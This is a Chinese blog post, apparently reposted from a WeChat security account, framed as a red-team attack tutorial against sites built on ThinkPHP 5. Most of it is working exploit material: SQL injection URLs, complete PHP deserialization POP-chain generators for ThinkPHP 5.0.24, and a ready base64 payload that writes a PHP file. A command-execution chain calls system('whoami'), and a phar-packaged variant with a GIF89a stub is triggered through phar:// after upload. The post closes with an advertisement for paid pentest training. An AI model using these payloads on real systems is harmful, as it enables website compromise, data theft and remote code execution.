红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化

admin 2022年9月28日22:06:55安全文章评论40 views10262字阅读34分12秒阅读模式
红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化
红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化

1介绍

thinkphp框架开发的网站特别的多,如一些骗子站,传销站,还有一些网站cms都是基于整个框架。
这里主要针对thinkphp5这个版本。基于这个框架开发的产品特别多。

2常见漏洞

1.SQL注入1

<?php
namespace appindexcontroller;use thinkDb;class Index{ //sqli注入 public function test3(){ echo "test3"; $id = input('id'); $result = Db::name('users')->where("id = {$id}")->select(); echo "<pre>"; var_dump($result); echo "</pre>"; }

}
http://www.tp5024.com/index.php/index/index/test3/id/1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)

红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化

2.SQL注入2

<?php
namespace appindexcontroller;use thinkDb;class Index{ public function index(){
$username = request()->get('username'); $result = db('users')->where('username','exp',$username)->select(); echo "<pre>"; var_dump($result); echo "</pre>"; }

}
http://www.tp123.com/index.php?m=index&c=index&username=)%20union%20select%20updatexml(1,concat(0x7,user(),0x7e),1)%23

红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化

3.thinkphp5 反序列化写文件
这里就以 thinkphp5.0.24 这个版本 其他版本大同小异

<?phpnamespace thinkprocesspipes{    use thinkmodelPivot;    use thinkcachedriverMemcached;    class Windows{        private $files = [];        public function __construct($path,$data){            $this->files = [new Pivot($path,$data)];        }    }    $data = base64_encode('<?php phpinfo();?>');    echo "tp5.0.24 write file pop Chainn";    echo "The '=' cannot exist in the data,please check:".$data."n";    $path = 'php://filter/convert.base64-decode/resource=./';    $aaa = new Windows($path,$data);    echo base64_encode(serialize($aaa));    echo "n";    echo 'filename:'.md5('tag_'.md5(true)).'.php';}namespace think{    abstract class Model    {}}namespace thinkmodel{    use thinkModel;    class Pivot extends Model{        protected $append = [];        protected $error;        public $parent;        public function __construct($path,$data){            $this->append['jelly'] = 'getError';            $this->error = new relationBelongsTo($path,$data);            $this->parent = new thinkconsoleOutput($path,$data);        }    }    abstract class Relation{}}namespace thinkmodelrelation{    use thinkdbQuery;    use thinkmodelRelation;    abstract class OneToOne extends Relation{}    class BelongsTo extends OneToOne{        protected $selfRelation;        protected $query;        protected $bindAttr = [];        public function __construct($path,$data){            $this->selfRelation = false;            $this->query = new Query($path,$data);            $this->bindAttr = ['a'.$data];        }    }}namespace thinkdb{    use thinkconsoleOutput;    class Query{        protected $model;        public function __construct($path,$data){            $this->model = new Output($path,$data);        }    }}namespace thinkconsole{    use thinksessiondriverMemcache;    class Output{        protected $styles = [];        private $handle;        public function __construct($path,$data){            $this->styles = ['getAttr'];            $this->handle = new Memcache($path,$data);        }    }}namespace thinksessiondriver{    use thinkcachedriverFile;    use thinkcachedriverMemcached;    class Memcache{        protected $handler = null;        protected $config  = [            'expire'       => '',            'session_name' => '',        ];        public function __construct($path,$data){            $this->handler = new Memcached($path,$data);        }    }}namespace thinkcachedriver{    class Memcached    {        protected $handler;        protected $tag;        protected $options = [];        public function __construct($path,$data){            $this->options = ['prefix'   => ''];            $this->handler = new File($path,$data);            $this->tag = true;        }    }}namespace thinkcachedriver{    class File    {        protected $options = [];        protected $tag;        public function __construct($path,$data){            $this->tag = false;            $this->options = [                'expire'        => 0,                'cache_subdir'  => false,                'prefix'        => '',                'path'          => $path,                'data_compress' => false,            ];        }    }}

在代码审计里如果发现unserialize这个函数传入的参数可控 就可以进行利用了 通常的情况下 是
unserialize(加密函数(传入值)) 这种模式居多  这里就以这个为例子。

<?phpnamespace appindexcontroller;
class Index{ public function index(){

return "thinkphp 5.0.24";

}
//反序列化 public function test1(){ $id = unserialize(base64_decode($_GET['data'])); var_dump($id); } //反序列化 phar public function test2(){ echo file_get_contents($_GET['file']); } }


http://www.tp5024.com/index.php/index/index/test1?data=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


4.thinkphp5 phar反序列化  
首先 php里要关闭这个只读模式
红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化

红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化

红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化

thinkphp5.0.24 还有其他链子

<?phpnamespace thinkprocesspipes{    use thinkmodelPivot;    ini_set('display_errors',1);    class Windows{        private $files = [];        public function __construct($function,$parameter){            $this->files = [new Pivot($function,$parameter)];        }    }    $aaa = new Windows('system','whoami');    echo base64_encode(serialize($aaa));}



namespace think{ abstract class Model {}}namespace thinkmodel{ use thinkModel; use thinkconsoleOutput; class Pivot extends Model{ protected $append = []; protected $error; public $parent; public function __construct($function,$parameter){ $this->append['jelly'] = 'getError'; $this->error = new relationBelongsTo($function,$parameter); $this->parent = new Output($function,$parameter); } } abstract class Relation{}}namespace thinkmodelrelation{ use thinkdbQuery; use thinkmodelRelation; abstract class OneToOne extends Relation{} class BelongsTo extends OneToOne{ protected $selfRelation; protected $query; protected $bindAttr = []; public function __construct($function,$parameter){ $this->selfRelation = false; $this->query = new Query($function,$parameter); $this->bindAttr = ['']; } }}namespace thinkdb{ use thinkconsoleOutput; class Query{ protected $model; public function __construct($function,$parameter){ $this->model = new Output($function,$parameter); } }}namespace thinkconsole{ use thinksessiondriverMemcache; class Output{ protected $styles = []; private $handle; public function __construct($function,$parameter){ $this->styles = ['getAttr']; $this->handle = new Memcache($function,$parameter); } }}namespace thinksessiondriver{ use thinkcachedriverMemcached; class Memcache{ protected $handler = null; protected $config = [ 'expire' => '', 'session_name' => '', ]; public function __construct($function,$parameter){ $this->handler = new Memcached($function,$parameter); } }}namespace thinkcachedriver{ use thinkRequest; class Memcached{ protected $handler; protected $options = []; protected $tag; public function __construct($function,$parameter){ // pop链中需要prefix存在,否则报错 $this->options = ['prefix' => 'jelly/']; $this->tag = true; $this->handler = new Request($function,$parameter); } }}namespace think{ class Request { protected $get = []; protected $filter; public function __construct($function,$parameter){ $this->filter = $function; $this->get = ["jelly"=>$parameter]; } }}


这个是命令执行的 将它改成 phar 生成的包

<?phpnamespace thinkprocesspipes{    use thinkmodelPivot;    ini_set('display_errors',1);    class Windows{        private $files = [];        public function __construct($function,$parameter){            $this->files = [new Pivot($function,$parameter)];        }    }
}


namespace { use thinkprocesspipesWindows; $data= new Windows('system', 'whoami'); unlink('exp2.phar'); $phar = new Phar('exp2.phar'); $phar -> stopBuffering(); $phar->setStub("GIF89a"."<?php __HALT_COMPILER();?>");//设置stub $phar -> addFromString('test.txt','test'); $object = $data; $phar -> setMetadata($object); $phar -> stopBuffering();}

namespace think{ abstract class Model {}}namespace thinkmodel{ use thinkModel; use thinkconsoleOutput; class Pivot extends Model{ protected $append = []; protected $error; public $parent; public function __construct($function,$parameter){ $this->append['jelly'] = 'getError'; $this->error = new relationBelongsTo($function,$parameter); $this->parent = new Output($function,$parameter); } } abstract class Relation{}}namespace thinkmodelrelation{ use thinkdbQuery; use thinkmodelRelation; abstract class OneToOne extends Relation{} class BelongsTo extends OneToOne{ protected $selfRelation; protected $query; protected $bindAttr = []; public function __construct($function,$parameter){ $this->selfRelation = false; $this->query = new Query($function,$parameter); $this->bindAttr = ['']; } }}namespace thinkdb{ use thinkconsoleOutput; class Query{ protected $model; public function __construct($function,$parameter){ $this->model = new Output($function,$parameter); } }}namespace thinkconsole{ use thinksessiondriverMemcache; class Output{ protected $styles = []; private $handle; public function __construct($function,$parameter){ $this->styles = ['getAttr']; $this->handle = new Memcache($function,$parameter); } }}namespace thinksessiondriver{ use thinkcachedriverMemcached; class Memcache{ protected $handler = null; protected $config = [ 'expire' => '', 'session_name' => '', ]; public function __construct($function,$parameter){ $this->handler = new Memcached($function,$parameter); } }}namespace thinkcachedriver{ use thinkRequest; class Memcached{ protected $handler; protected $options = []; protected $tag; public function __construct($function,$parameter){ // pop链中需要prefix存在,否则报错 $this->options = ['prefix' => 'jelly/']; $this->tag = true; $this->handler = new Request($function,$parameter); } }}namespace think{ class Request { protected $get = []; protected $filter; public function __construct($function,$parameter){ $this->filter = $function; $this->get = ["jelly"=>$parameter]; } }}

找个地方上传 审计文件操作函数 然后传入就可以了。

一般的方法是上传图片 再用phar访问就能触发了

http://www.tp5024.com/index.php/index/index/test2?file=phar://exp2.gif/test.txt

红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化

3关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏

4关于培训

需要渗透测试培训可联系暗月

手机扫一扫 即可添加好友咨询

红队攻击第3篇 thinkphp5框架 注入 反序列化写文件  phar反序列化
课程详细介绍点击下面连接即可了解
暗月渗透测试课程更新


原文始发于微信公众号(moonsec):红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月28日22:06:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化 http://cn-sec.com/archives/1321860.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: